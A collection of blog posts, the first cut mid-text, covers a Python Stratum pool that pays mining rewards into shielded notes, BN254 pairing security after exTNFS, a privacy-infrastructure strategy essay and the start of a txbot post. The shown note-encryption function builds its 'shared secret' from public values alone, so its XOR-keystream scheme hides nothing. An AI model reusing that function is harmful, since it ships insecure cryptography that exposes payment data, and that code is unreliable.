3. **I can edit the running pool.** When you're debugging a chain at 4 AM and your Bitaxe disconnected, "edit the script and restart" is a faster path than "edit the Rust, recompile, redeploy, kill and restart." Python wins on the iteration loop.

The full upstream story is that Vanta originally used a public-pool fork (Node.js) and the Python server is the *replacement* I wrote when the public-pool fork couldn't handle the privacy-coinbase requirements. That's the part the rest of this post is about.

## Mandatory privacy mining

Vanta v2 chain consensus rejects any non-coinbase transaction that doesn't satisfy the witness-v2 commitment-binding rules. **Coinbase transactions are also required to be witness v2.** From the top of the Stratum server:

```python
SHIELDED_PUBKEY = os.environ.get("SHIELDED_PUBKEY", "").strip()
if not SHIELDED_PUBKEY or len(SHIELDED_PUBKEY) != 64:
    print("[FATAL] SHIELDED_PUBKEY env var is required (32-byte hex, 64 chars).", file=sys.stderr)
    print("        Vanta v2 chain has no transparent mining payouts.", file=sys.stderr)
    sys.exit(1)
```

The pool refuses to start without a shielded pubkey. 
There is no transparent fallback. A miner who points a Bitaxe at this server is paying out into a shielded note from block one. The note-construction code is also worth quoting because it pinned down the on-chain format we ended up shipping:

```python
def create_mining_note(value: int, owner_pubkey: bytes) -> tuple:
    """Create a private note for auto-shielded mining reward.
    Returns (commitment_hash, randomness)."""
    randomness = os.urandom(32)
    # preimage layout reconstructed here — see pool/stratum_server.py
    # for the canonical field order
    preimage = (
        struct.pack('<Q', value)  # note value, little-endian u64
        + owner_pubkey            # 32-byte shielded pubkey
        + randomness              # 32-byte blinding factor
    )
    commitment_hash = hashlib.sha256(preimage).digest()
    return commitment_hash, randomness


def witness_v2_script(commitment_hash: bytes) -> bytes:
    """Build witness v2 scriptPubKey: OP_2 PUSH32 <commitment>."""
    return bytes([0x52, 0x20]) + commitment_hash
```

`OP_2 PUSH32 <commitment>` is the witness-v2 anchor format; the C++ consensus code parses this exactly and uses the pushed 32 bytes as the input commitment when a future spend witness comes through. From the chain's perspective, the coinbase pays into "this commitment" and the value field on the transaction is zero. The pool also adds an OP_RETURN anchor for L2 indexers to find:

```python
def commitment_anchor_script(commitment_hash: bytes) -> bytes:
    """Build OP_RETURN anchor: OP_RETURN PUSH34 <0xbb 0x00 || commitment>."""
    payload = bytes([0xbb, 0x00]) + commitment_hash  # 34 bytes
    return bytes([0x6a]) + encode_varint(len(payload)) + payload
```

`OP_RETURN 0xbb 0x00 <commitment>` is the indexer-side anchor; `vanta-node`'s L1 watcher scans for this byte sequence and feeds matches into the SMT.

## Solo-mining accounting vs pool accounting

Public pools track per-miner shares and pay out at end-of-round based on share contributions. The math is non-trivial: PPLNS, FPPS, score-based, etc. A solo pool doesn't need any of that. Whoever finds the block keeps the whole reward. The Stratum server has miners, but the only thing it does with their share-count is *monitoring*, not accounting. This simplification is huge. There's no payout database, no end-of-round settlement, no fee policy, no withdrawal endpoint. The pool's only persistent state is: 1. The pending-L2-submission queue (`pending_l2_submissions.json`). 2. 
Optionally the local note backup (`SHIELDED_NOTES_FILE`, off by default). Both are JSON files. The pool can be killed, restarted, even moved between machines, and the only state that matters is the on-chain commitment + the L2 sidecar's encrypted-note inbox. The pool host isn't the source of truth for anything user-visible. This is *exactly* how a solo-mining server should work. The complexity of a public pool comes from settling between multiple miners. A solo pool inherits none of that.

## The L2 retry queue

This is the thing that ate a week to get right. The flow:

1. Bitaxe submits a share that meets block difficulty.
2. Pool calls `submitblock` against `vantad`.
3. `vantad` accepts the block.
4. Pool generates the encrypted note for the miner's reward.
5. Pool POSTs the encrypted note to `vanta-node`'s `/submit` endpoint.

What if step 5 fails? The L2 sidecar might be restarting, the network might be flaky, the sidecar might be slow under load. We can't lose the encrypted note — without it, the miner's wallet can't discover the reward. The first version retried in-process, blocking the share-acceptance loop. Bad idea: a slow L2 stalls the whole pool. The second version queued the failed submission to a file and a background thread retried every 30 seconds:

```python
def _retry_worker():
    """Background worker — drains the L2 retry queue every 30 seconds."""
    while True:
        try:
            drain_pending_l2_queue()
        except Exception as e:
            print(f"[SHIELD] retry worker error: {e}")
        time.sleep(30)
```

This is the version that shipped. Failed submissions go to `pending_l2_submissions.json`, get retried until accepted, get removed from the queue. The pool host can be restarted and the queue persists. A subtle detail: this is called *only* on `submitblock` accept, not on every Stratum job-template push. From the comment in `save_shielded_note`:

```python
"""Persist mining note and submit encrypted note to L2 for wallet discovery.

Called ONLY after a winning block is accepted by submitblock — never from the
per-share job-template path, otherwise the L2 SMT fills up with phantom
commitments for templates that never won the PoW race.
"""
```

The first version called this from the job-template path, which is the path that runs every time the pool decides to push fresh work to its connected miners. With a 1-minute block time and longpoll discipline, that's roughly every 1–2 seconds. So the L2 SMT was getting hundreds of phantom commitments per actual block, all for blocks that never won the PoW race. That bug shipped to a testnet for about 6 hours before I noticed; the cleanup involved replaying the L2 from genesis with the fix applied. Don't put non-idempotent side effects in your job-template path.

## Encrypted-note construction

The `encrypt_note_for_recipient` function is the bit that lets a miner's wallet *find* its reward without the chain leaking what was paid:

```python
def encrypt_note_for_recipient(recipient_pubkey: bytes, value: int, asset_type: int,
                               randomness: bytes, commitment: bytes) -> dict:
    """Encrypt note data so the recipient can discover it via L2 sync.
    Matches vanta-core encrypt.rs exactly: domain-separated SHA256 + XOR stream."""
    ephemeral_secret = os.urandom(32)
    ephemeral_pubkey = hash_with_domain(b"Vanta/Ephemeral/v1", ephemeral_secret)
    shared_secret = hash_with_domain(b"Vanta/SharedSecret/v1",
                                     ephemeral_pubkey + recipient_pubkey)
    # plaintext layout and keystream expansion reconstructed here — see
    # pool/stratum_server.py and vanta-core's encrypt.rs for the canonical format
    plaintext = struct.pack('<QI', value, asset_type) + randomness
    keystream = b""
    counter = 0
    while len(keystream) < len(plaintext):
        keystream += hash_with_domain(b"Vanta/NoteCipher/v1",
                                      shared_secret + bytes([counter]))
        counter += 1
    ciphertext = bytes(p ^ k for p, k in zip(plaintext, keystream))
    return {
        "commitment": commitment.hex(),
        "ephemeral_pubkey": ephemeral_pubkey.hex(),
        "ciphertext": ciphertext.hex(),
    }
```

---

# BN254: where the 128 bits went

> This is a working post in my [PhD-by-publication track](/about). The arithmetic is checked against [Barbulescu and Duquesne (2019)](https://eprint.iacr.org/2017/334) for the security level estimates and the [IETF CFRG pairing-friendly curves draft](https://datatracker.ietf.org/doc/draft-irtf-cfrg-pairing-friendly-curves/) for the standardisation status. 
## The minimum cryptography you need A pairing is a bilinear map $$ e : \mathbb{G}_1 \times \mathbb{G}_2 \to \mathbb{G}_T $$ with $\mathbb{G}_1, \mathbb{G}_2$ cyclic groups of prime order $r$ on an elliptic curve $E$, and $\mathbb{G}_T$ a multiplicative subgroup of an extension field $\mathbb{F}_{p^k}$. *Bilinear* means $$ e(a P, b Q) = e(P, Q)^{ab} $$ for any $a, b \in \mathbb{Z}_r$ and generators $P, Q$. That single equation is the entire reason pairing-based cryptography exists — it lets you "multiply in the exponent" across two different groups, which is exactly what Groth16's verification equation needs. Two parameters drive everything. **The embedding degree $k$** is the smallest integer with $r \mid p^k - 1$; it sets the size of the target field $\mathbb{F}_{p^k}$. **The base field characteristic $p$** sets the cost of every operation in $\mathbb{G}_1$. The security of the pairing rests on: - The discrete log problem (DLP) in $\mathbb{G}_1$ and $\mathbb{G}_2$ — protected by Pollard's rho, cost $\sqrt{r}$, so we want $r \approx 2^{256}$ for 128-bit security. - The DLP in $\mathbb{F}_{p^k}^*$ — protected by the **number field sieve**, cost subexponential in $p^k$, so we want $p^k$ large enough that NFS is no easier than $\sqrt{r}$. The trick of pairing-friendly curve design is to find $(p, r, k)$ where both DLPs are hard *and* $p$ is small enough that field operations don't dominate. BN curves use the parameterisation $$ p(t) = 36 t^4 + 36 t^3 + 24 t^2 + 6 t + 1, $$ $$ r(t) = 36 t^4 + 36 t^3 + 18 t^2 + 6 t + 1, $$ with $E: y^2 = x^3 + 3$ defined over $\mathbb{F}_p$ and embedding degree $k = 12$. Pick $t$ such that $p$ and $r$ are both prime, and you get a curve. BN254 is the choice $t = 4965661367192848881$ — an integer carefully chosen so $p$ has 254 bits and $r$ has 254 bits, and so the resulting field arithmetic is reasonably efficient. 
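The parameterisation is cheap to sanity-check with stdlib Python — the bit lengths, the primality of $p$ and $r$, and the identity $p - r = 6t^2$ (for BN curves the trace of Frobenius is $6t^2 + 1$, and $r = p + 1 - \mathrm{tr}$). The Miller-Rabin helper below is my own scratch code, not from any codebase in this series:

```python
# Check the BN parameterisation at BN254's t: bit lengths, primality,
# and the trace relation p - r = 6t^2.
import random

def is_probable_prime(n: int, rounds: int = 20) -> bool:
    """Miller-Rabin probabilistic primality test."""
    if n < 2:
        return False
    for small in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % small == 0:
            return n == small
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for _ in range(rounds):
        a = random.randrange(2, n - 1)
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

t = 4965661367192848881
p = 36*t**4 + 36*t**3 + 24*t**2 + 6*t + 1
r = 36*t**4 + 36*t**3 + 18*t**2 + 6*t + 1

print(p.bit_length(), r.bit_length())              # 254 254
print(is_probable_prime(p), is_probable_prime(r))  # True True
print(p - r == 6*t**2)                             # True
```

Both bit lengths come out at 254, which is the "254" in the name.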
## Where the 128 bits went When BN254 was deployed in 2010-2015, the security argument was: $p^{12} \approx 2^{3048}$, the NFS algorithm at the time required $\approx 2^{128}$ field operations to break the DLP in $\mathbb{F}_{p^{12}}^*$, and Pollard's rho on $\mathbb{G}_1$ required $\approx 2^{127}$. Both legs landed at 128-bit security. Done. Then [Kim and Barbulescu (2016)](https://eprint.iacr.org/2015/1027) introduced **exTNFS**, an extended Tower NFS variant that exploits the structure of $\mathbb{F}_{p^k}$ when $k$ has a non-trivial factorisation (which $k = 12 = 4 \cdot 3$ does). The complexity of NFS dropped, and the [Barbulescu-Duquesne (2019) update](https://eprint.iacr.org/2017/334) re-estimated the security of BN254 at **roughly 100-110 bits** — depending on which constant in the NFS asymptotic you trust. That is the gap. The curve is not broken. The pairing still works. But "BN254 = 128-bit security" was the marketing line, and after 2016 it should have been "BN254 ≈ 100 bits." The honest table:

| Curve | Post-exTNFS security | Blast radius (what's deployed on it) |
|---|---|---|
| BN254 | ~100-110 bits | Ethereum precompile, Solana `alt_bn128_*`, most Groth16 tooling |
| BLS12-381 | ~120-126 bits | Ethereum, Filecoin, Zcash Sapling |
| BLS12-446 | ~128 bits with margin | little production exposure |
| BN462 | ~128 bits, CFRG-recommended | little production exposure |

The blast-radius column is the load-bearing one. **BN254 is not broken in 2026.** A 100-bit security level still costs an attacker $\sim 2^{100}$ field operations, which is not within the budget of any actor we model. But it is also not a curve you start a fresh decade-long deployment on. 
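The two legs of that argument are easy to reproduce with rough log accounting: the generic-attack leg costs $\sqrt{r}$ group operations via Pollard's rho (the leg exTNFS did *not* touch), and the NFS leg attacks the DLP in the target field $\mathbb{F}_{p^{12}}$. A quick back-of-envelope:

```python
# Rough sizes of the two attack legs against BN254. Pollard's rho
# costs ~sqrt(r) group operations; NFS attacks F_{p^12}, a field of
# a bit over 3000 bits.
t = 4965661367192848881
p = 36*t**4 + 36*t**3 + 24*t**2 + 6*t + 1
r = 36*t**4 + 36*t**3 + 18*t**2 + 6*t + 1

rho_bits = r.bit_length() // 2            # ~log2(sqrt(r))
target_field_bits = (p**12).bit_length()  # size of F_{p^12}

print(f"Pollard rho:  ~2^{rho_bits} group ops")
print(f"target field: {target_field_bits}-bit F_p^12")
```

The rho leg still sits at $\sim 2^{127}$; only the NFS leg moved, which is why the post-exTNFS estimate hinges entirely on the target-field analysis.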
## The migration hierarchy

The pairing-friendly curve landscape, drawn as a hierarchy of "what would I deploy next":

```mermaid
flowchart TD
    BN254["BN254 — ~100 bit after exTNFS, today's default"]
    BN254 --> BLS381["BLS12-381 — ~120-126 bit, Ethereum/Filecoin/Sapling"]
    BLS381 --> BLS446["BLS12-446 — clean ~128 bit with margin"]
    BLS381 --> BLS24["BLS24-509 — embedding degree 24, niche"]
    BLS446 --> PQ["Post-quantum candidates: lattice (Falcon/Dilithium), STARK-based"]
    BLS24 --> PQ
    BN254 -.-> PQ
    classDef now fill:#1a1a1a,stroke:#4ade80,color:#4ade80
    classDef next fill:#1a1a1a,stroke:#a3a3a3,color:#e8e8e8
    classDef long fill:#1a1a1a,stroke:#737373,color:#a3a3a3
    class BN254 now
    class BLS381,BLS446,BLS24 next
    class PQ long
```

The bottom row is what kills pairing-based cryptography eventually. Shor's algorithm runs in polynomial time on a sufficiently large quantum computer, the discrete log breaks, and every curve in the diagram above goes to zero overnight. The realistic time horizon for that is *not 2026* — the largest credible quantum factorisation as of last year is still toy-scale — but it is the reason you build a hash function migration story into your protocol from day one. We did this in [zera-sdk](/blog/zera_sdk_scaffolding/) by isolating the curve choice to a single `crates/zera-sdk-core/src/curve.rs` module. A future migration to BLS12-381 is one type alias and a regenerated `.zkey`. A migration to a lattice-based scheme is a bigger lift but the seam is clean.

## Why the IETF still hasn't picked one

The IETF CFRG has been running a pairing-friendly curves working group since 2018. As of [draft 11](https://datatracker.ietf.org/doc/draft-irtf-cfrg-pairing-friendly-curves/), the recommendation lists **BLS12-381 and BN462** as the two curves with 128-bit security after exTNFS. BN254 is explicitly *not* recommended for new deployments — the draft notes:

> The BN curves with smaller parameters such as BN254 should not be used for applications requiring 128-bit security level due to the recent improvements of the number field sieve algorithm. 
> Implementations targeting the 128-bit security level SHOULD use BLS12-381 or BN462.

The reason BN254 is still the production default in 2026 despite this is one part path-dependence (the Ethereum precompile is BN254 and rewriting that is a hard fork) and one part cost (BLS12-381 is roughly 50% slower per pairing and 50% larger per group element). For a privacy pool that is already paying tens of milliseconds per proof, the trade-off is real. The clean argument: BN254 today, BLS12-381 next, lattice-based when the quantum threat becomes credible. That ordering is what every serious protocol designer I've talked to in the last year converges on.

## Pairing arithmetic, by hand

The pairing itself is a Miller-loop algorithm followed by a final exponentiation. It is unreasonable to derive in a blog post — go read [Barreto, Galbraith, Ó hÉigeartaigh, Scott (2007)](https://eprint.iacr.org/2007/077) for the optimal-Ate construction — but the *bilinearity check* is one line and worth seeing:

$$ e([a]P, [b]Q) = e(P, Q)^{ab} $$

The toy below verifies this property. It uses a synthetic group and a synthetic pairing — *not* BN254, because computing a real BN254 pairing in 60 lines of TypeScript is not honest pedagogy. The shape of the relations is real. The numbers are not.

```ts
// Synthetic "pairing" demo: G_1, G_2, G_T are all the multiplicative
// group mod a tiny prime, so the bilinear algebra is checkable by hand.
const Q = 2147483647n;   // 2^31 - 1, prime (tiny on purpose)
const G = 7n;            // a primitive root mod Q
const ORD = Q - 1n;      // group order

function modpow(base: bigint, exp: bigint, m: bigint): bigint {
  let r = 1n;
  base %= m;
  while (exp > 0n) {
    if (exp & 1n) r = (r * base) % m;
    base = (base * base) % m;
    exp >>= 1n;
  }
  return r;
}

// "G_1" and "G_2" are both the same multiplicative group here for the
// demo. In real pairing curves they're DIFFERENT EC subgroups.
function scalarMul(P: bigint, k: bigint): bigint {
  return modpow(P, k, Q);
}

function babyStepGiantStep(target: bigint): bigint {
  // tiny demo helper — only feasible because Q ~ 2^31.
  const m = 1n << 16n;
  const table = new Map<string, bigint>();
  let cur = 1n;
  for (let j = 0n; j < m; j++) {
    table.set(cur.toString(), j);
    cur = (cur * G) % Q;
  }
  const factor = modpow(modpow(G, m, Q), ORD - 1n, Q); // G^{-m}
  let gamma = target;
  for (let i = 0n; i < m; i++) {
    const hit = table.get(gamma.toString());
    if (hit !== undefined) return (i * m + hit) % ORD;
    gamma = (gamma * factor) % Q;
  }
  throw new Error("no log");
}

// "Pairing": we model e(g^a, g^b) = g^{ab} by recovering the exponents.
// Real pairings are far more involved; this is only the algebra.
function pair(P: bigint, R: bigint): bigint {
  const a = babyStepGiantStep(P);
  const b = babyStepGiantStep(R);
  return modpow(G, (a * b) % ORD, Q);
}

const a = 17n, b = 23n;
const P = scalarMul(G, a);
const R = scalarMul(G, b);

const direct = pair(P, R);                       // e(P, R)
const eGG = pair(G, G);
const expected = modpow(eGG, (a * b) % ORD, Q);  // e(G, G)^{ab}

console.log(`e(P, R)      = ${direct}`);
console.log(`e(G, G)^{ab} = ${expected}`);
console.log(`bilinear holds: ${direct === expected}`);

// Mismatched scalars confirm the structure.
console.log(pair(scalarMul(G, 5n), scalarMul(G, 11n)) === modpow(eGG, 55n, Q));
```

The Rust shape of a real pairing — using [arkworks](https://github.com/arkworks-rs) — is much closer to a one-liner once the curve is in scope:

```rust
// Skeleton showing how arkworks expresses bilinearity. Won't compile here
// without the ark-bn254 / ark-ec deps; this is the SHAPE of the production
// code in zera-sdk-core/src/pairing.rs.

// use ark_bn254::{Bn254, Fr, G1Affine, G2Affine};
// use ark_ec::{pairing::Pairing, PrimeGroup};

fn main() {
    // let g1 = G1Affine::generator();
    // let g2 = G2Affine::generator();
    // let a = Fr::from(17u64);
    // let b = Fr::from(23u64);
    //
    // let p1 = (g1 * a).into();
    // let q1 = (g2 * b).into();
    //
    // let lhs = Bn254::pairing(p1, q1);
    // let rhs = Bn254::pairing(g1, g2).pow(&[(a * b).into_bigint().0[0]]);
    //
    // assert_eq!(lhs, rhs); // bilinearity
    //
    // The whole Groth16 verifier reduces to a constant number of these
    // pairings — three for Groth16, plus a multi-pairing-product check.
    println!("see crates/zera-sdk-core/src/pairing.rs for the real code");
}
```

The real implementation lives in [arkworks-rs/algebra](https://github.com/arkworks-rs/algebra) and [supranational/blst](https://github.com/supranational/blst). The latter is what production Ethereum and Solana ZK code links against — `blst` is Supranational's audited BLS12-381 pairing library, with constant-time multi-scalar multiplication that beats anything else in open source.

## What changes if we move to BLS12-381

The migration cost is not the curve. The migration cost is everything that touches the curve. 1. **Re-run the trusted setup.** Groth16 needs a per-circuit setup. Migrating to BLS12-381 means a fresh ceremony for every circuit. That is non-trivial — a Powers-of-Tau ceremony runs for months — but it is also not blocked on cryptography. 2. **Regenerate the verifying keys.** Every on-chain verifier ships a verifying key (a few KB of curve points). Those have to be regenerated and re-deployed. 
On Solana, that's a program upgrade. On Ethereum, that's a fresh contract deploy. 3. **Update every prover.** snarkjs, rapidsnark, the Rust prover in [zera-sdk-core](https://github.com/Dax911/zera-sdk) — all of them. The `ff` and `pairing` crate ecosystem in Rust is curve-generic, so this is an `ark-bn254` → `ark-bls12-381` swap and a recompile. The TypeScript side is harder because circomlibjs is BN254-pinned in places. 4. **Eat the verifier-cost hit.** A BLS12-381 pairing is roughly 50% more expensive than BN254. On Solana that's 1500 extra compute units per pairing-based verification. Multiplied by the four pairings in a typical multi-input transfer proof, that's 6000 CUs — meaningful but absorbable. We've scoped this work for [zera-sdk](/blog/zera_sdk_scaffolding/) v2 but not yet committed to a date. The bet is: BN254 carries us through 2027 deployments comfortably, and the BLS12-381 migration is a clean lift the moment the broader Solana ecosystem standardises on it (the `alt_bls12_381_*` syscalls have been behind cargo feature flags since 2025).

## Where this lands in the stack

In `crates/zera-sdk-core/src/curve.rs` the curve is a single type alias:

```rust
// Currently:
pub type Curve = ark_bn254::Bn254;
pub type Fr = ark_bn254::Fr;
pub type G1 = ark_bn254::G1Affine;
pub type G2 = ark_bn254::G2Affine;

// Future:
// pub type Curve = ark_bls12_381::Bls12_381;
// pub type Fr = ark_bls12_381::Fr;
// ...etc
```

The whole SDK reads from `Curve`, `Fr`, `G1`, `G2`. The migration is a four-line swap and a re-ceremony. The cleanliness is on purpose — see [Building the Zera SDK: Day One](/blog/zera_sdk_scaffolding/) for why we boxed the curve choice the way we did. What I tell people who ask "should I deploy on BN254 or BLS12-381?": deploy on BN254 if you need to compose with the Ethereum precompile or the Solana `alt_bn128_*` syscall *today*, deploy on BLS12-381 if you don't and you want the security headroom. The math is the math. 
The deployment surface is what makes the call. ## Further reading - [Updating Key Size Estimations for Pairings](https://eprint.iacr.org/2017/334) — Barbulescu, Duquesne (Journal of Cryptology 2019) — the post-exTNFS security recompute. - [Extended Tower Number Field Sieve: A New Complexity for the Medium Prime Case](https://eprint.iacr.org/2015/1027) — Kim, Barbulescu (CRYPTO 2016) — the attack that dropped BN254's security. - [Pairing-Friendly Curves (IETF CFRG draft)](https://datatracker.ietf.org/doc/draft-irtf-cfrg-pairing-friendly-curves/) — the standardisation path. - [BLS12-381 For The Rest Of Us](https://hackmd.io/@benjaminion/bls12-381) — Ben Edgington's accessible explainer. - [arkworks-rs/algebra](https://github.com/arkworks-rs/algebra) — the curve-generic Rust implementation we use. - [supranational/blst](https://github.com/supranational/blst) — the production BLS12-381 library. - [Pedersen commitments, in production](/blog/pedersen_commitments_in_production/) — the sister piece on what we commit *with*. - [Poseidon, by hand and by code](/blog/poseidon_by_hand_and_by_code/) — the hash that lives inside circuits over the same curve. --- # Privacy's broadband moment Canonical: https://blog.skill-issue.dev/blog/privacys_broadband_moment/ Description: ZK got fast, hardware got attestable, AI agents started carrying their own wallets, and regulators stopped trying to ban math. Four curves crossed and privacy stopped being a research topic — it became infrastructure. Published: 2026-04-15T08:00:00.000Z Tags: zera, zk, cryptography, strategy, founders There is a phrase we keep using internally at [Zera Labs](https://zeralabs.org): *privacy's broadband moment.* It started as a slide-deck line, the kind of thing you put in front of an investor to explain why a fifteen-year-old idea is suddenly a 2026 product. After a year of saying it I realised it is also the most precise description I have for what is actually happening in the cryptography stack right now. 
Broadband did not arrive because someone invented broadband. It arrived because **four unrelated curves crossed at the same time**: fibre got cheap, video codecs got good, last-mile rights-of-way got resolved, and people stopped thinking of "the internet" as a separate thing they used at a desk. None of those four was sufficient. All four together were inevitable.

Zero-knowledge cryptography is having the same moment. I want to lay out the four curves I see, one at a time, and then say what we are doing about it.

## Curve 1 — proof systems finally got fast

For most of the last decade, "fast ZK" meant Groth16 over BN254 with a trusted setup and proving times measured in seconds for circuits that did anything useful. That was good enough for academic papers and bad enough for products. People shipped in spite of it. Tornado Cash circuits took four-plus seconds to prove on a laptop in 2020. That is not a consumer experience; that is a research demo.

The thing that actually changed in 2024 and 2025 is the boring thing: **hash-friendly arithmetisation went mainstream.** Poseidon (and the Poseidon-2 successor) went from a "cool paper at SAC 2019" to the default ZK-friendly hash inside almost every modern proof system. Once you have a hash that costs ~250 constraints per permutation instead of the ~24,000 that SHA-256 takes inside a SNARK, the entire calculus of "what circuits are practical to prove on a phone" inverts.

The [`zera-sdk` Rust core](https://github.com/Dax911/zera-sdk) ships Poseidon as the only commitment hash. We did not invent that decision; we inherited it. Every serious privacy pool in 2026 made the same call. The reason ZERA can talk about *unified* shielding — one pool that holds USDC and USDT and SOL and `$ZERA` and a dozen other tokens at once — is that the per-note proof cost finally dropped below the threshold where wallet UX would tolerate it.
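To make the constraint arithmetic concrete, here is a back-of-envelope sketch. The per-permutation figures are the rough numbers from the paragraph above; the depth-32 Merkle tree is my illustrative assumption, not a ZERA parameter.

```rust
// Back-of-envelope constraint budget for proving one Merkle membership path.
// The per-hash costs are the rough figures quoted above; the tree depth is
// an illustrative assumption, not a ZERA parameter.
const POSEIDON_CONSTRAINTS: u64 = 250; // ~constraints per Poseidon permutation
const SHA256_CONSTRAINTS: u64 = 24_000; // ~constraints per SHA-256 compression
const TREE_DEPTH: u64 = 32; // hypothetical Merkle tree depth

fn path_cost(per_hash: u64) -> u64 {
    // one hash per tree level on the way to the root
    TREE_DEPTH * per_hash
}

fn main() {
    println!("Poseidon path: {} constraints", path_cost(POSEIDON_CONSTRAINTS)); // 8,000
    println!("SHA-256 path:  {} constraints", path_cost(SHA256_CONSTRAINTS)); // 768,000
    println!("ratio: {}x", SHA256_CONSTRAINTS / POSEIDON_CONSTRAINTS); // 96x
}
```

At these numbers a single membership proof drops from hundreds of thousands of constraints to a few thousand, which is the difference between "prove on a server" and "prove in a wallet."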
I wrote about how this looks at the metal level in [Pedersen commitments, in production](/blog/pedersen_commitments_in_production/) and [Nullifiers without the witchcraft](/blog/nullifiers_without_witchcraft/). Short version: the production implementation is six lines of code per primitive, and the line of code that made it six lines instead of six hundred is the choice of Poseidon.

## Curve 2 — hardware attestation stopped being theatre

The second curve is the one nobody likes to talk about because it sounds like 2014 trusted-execution marketing. But it is real now in a way that it was not.

Apple's Secure Enclave shipped in 2013. For a decade it was a place you stored your fingerprint hash and your Apple Pay tokens. In 2026 it is a place you can ship cryptographic primitives that the OS itself cannot read or steal, *with attested provenance.* Pixel devices have Titan M2. Modern AMD chips have SEV-SNP. ARM TrustZone is everywhere. The attestation chains are documented, the developer APIs are stable enough to build against, and — critically — the *threat model* for what a TEE actually buys you stopped being aspirational.

This matters for the [True Offline Payments](https://zeralabs.org/#features) pillar of ZERA in a way that is hard to overstate. "Offline P2P payments" without a hardware trust anchor is a euphemism for "double-spend forever." With one, it is a sequence-numbered key-attested signature over a note that the rest of the network can verify when they reconcile. The cryptography is the easy part. The cryptography has been ready for a long time. What was not ready until very recently was the assumption that the user has a real TEE in their pocket and that we can tell whether they do.

[Foundry Digital taught me to think like an operator](/blog/what_running_a_bitcoin_mine_taught_me/) — the hardware *is* the system.
ZERA Hardware exists for the same reason mining ASICs exist: when the math is fixed and the silicon is differentiated, infrastructure is where the next decade of value lands.

## Curve 3 — AI agents grew wallets

The third curve is the one I genuinely did not see coming until late 2025. Coinbase shipped [x402](https://www.coinbase.com/developer-platform/discover/protocols/x402) — a stablecoin-payment protocol over HTTP — and the AI agent ecosystem absorbed it within a quarter. Anthropic's MCP standard went from "interesting Anthropic side project" to "ten thousand public servers, ninety-seven million SDK downloads a month" in the same window. Two things that should not have collided collided: **autonomous AI agents now carry their own wallets**, and the protocols they use to pay each other are running on stablecoin rails.

The implication for privacy is not subtle. An autonomous agent that buys a search result for `0.001 USDC` is making a transaction that — under any current rail — is permanently legible to anyone watching the chain. If your agent buys ten thousand search results across an afternoon while it does research for you, the sum of those transactions is a *behavioural signature* of you. Not your agent. *You.* Because the agent is acting on your instructions.

This is the use-case that turned privacy from "a thing crypto people argue about on Twitter" into "a thing every AI platform team will be procuring by Q4." There is no version of an autonomous-agent economy that is also a transparent-by-default payments graph. Either agents acquire privacy primitives, or agents stop being economically rational to operate at scale. We are betting that the first thing happens.

I wrote the threat-model framing for this earlier in the year — see the post on the [x402 honeypot research artifact](/blog/x402_honeypot_disclosure/) for why this is a 2026 problem and not a 2028 one.

## Curve 4 — the regulatory weather changed

I do not love writing about regulation.
I will keep this short. For most of the last decade, "we are building privacy infrastructure" was a sentence you said at a developer conference in Berlin and not at a meeting at the SEC. The Tornado Cash sanctions in 2022, the chilling effect on Nym and Aztec, the post-FTX legislative panic — all of it pushed serious privacy work either offshore or underground.

Two things shifted that. First, the [Fifth Circuit ruling overturning the Tornado Cash sanctions](https://www.fifthcircuit.gov/) in late 2024 re-established that *immutable code is not a sanctioned entity*. Second, the broader 2025-2026 stablecoin clarity work in the US, EU MiCA implementation, and the Hong Kong VASP regime made it possible for compliant venues to handle privacy assets the way they handle any other asset class — with KYC at the edges and pseudonymity in the middle.

ZERA is built **token-agnostic, chain-agnostic, and compliance-aware.** The pool holds USDC. USDC has a freeze function. We do not pretend it does not. The interesting design question stops being "how do we build a system that defies the regulator" and becomes "how do we build a system the regulator can verify *without* the regulator becoming a panopticon."

The answer to that question is zero-knowledge. The reason the answer is finally usable is that curves one through three made it cheap.

## What we are doing about it

Four curves crossing is necessary but not sufficient. Someone has to actually ship the thing. That is what Zera Labs is for. Concretely:

- **One unified shielded pool** instead of one per asset class. The pool is built on Solana for the [account-compression-driven cost model](/blog/zeraswap_compressed_amm/) — Light Protocol's compressed accounts let us amortise the per-note state cost down to something that works at consumer-payment scale.
- **A wallet that does not assume you are sitting at a desk.** [Zera Wallet](https://wallet.zeralabs.org) targets desktop, iOS, and Android *with the same primitives* — the offline-P2P story is real and is the reason we keep saying "digital cash" instead of "private DeFi."
- **An SDK with an MCP server in the box.** Every modern privacy primitive should be callable by an AI agent under a verifiable policy. We made that the default rather than the afterthought. See [Building the Zera SDK: Day One](/blog/zera_sdk_scaffolding/).
- **A research line that publishes.** I am doing a [PhD by publication](/about) in zero-knowledge proof systems while running the company. Every paper has a corresponding production component. Every production component has a paper that would not embarrass me in a peer-review queue.

## The thing I keep telling people

You can be early to the right idea by a decade and watch the wave roll in without you. The question is never "is this the future?" The question is "did the four curves cross *yet*?"

Privacy's four curves crossed in 2026. The next ten years are infrastructure-build. We are going to be a stupid fraction of that infrastructure or none of it, and either way the wave is happening.

If that sounds like the kind of thing you want to be in the middle of, [my calendar is open](https://cal.com/daxts).
## Further reading

- [zeralabs.org](https://zeralabs.org) — product surface
- [Pedersen commitments, in production](/blog/pedersen_commitments_in_production/)
- [Nullifiers without the witchcraft](/blog/nullifiers_without_witchcraft/)
- [Why I started Zera Labs](/blog/why_i_started_zera_labs/)
- [Building the Zera SDK: Day One](/blog/zera_sdk_scaffolding/)
- [What running a Bitcoin mine taught me about cloud margins](/blog/what_running_a_bitcoin_mine_taught_me/)
- Grassi et al., *Poseidon: A New Hash Function for Zero-Knowledge Proof Systems* (USENIX Security 2021)
- Anthropic, *Model Context Protocol Specification* (2025-11-25)

---

# Generating mempool with a Rust txbot

Canonical: https://blog.skill-issue.dev/blog/vanta_txbot_synthetic_mempool/
Description: Empty blocks lie. A new chain whose miners are mining empty templates is not exercising any of the code that fails in production. The txbot is a 200-line Rust loop that round-robins coins through 114 addresses to keep mempool honest.
Published: 2026-04-13T17:39:39.000Z
Tags: vanta, rust, txbot, mempool, testnet

There is a class of bug in a Bitcoin-style chain that you only ever see when the mempool is non-trivially full. Fee-rate accounting, RBF replacement, package relay, mempool eviction policies — all of it is only ever stressed by *real spend pressure*. A new chain whose miners are mining empty templates against an empty mempool is, by definition, not exercising any of that code. So you ship a transaction bot.

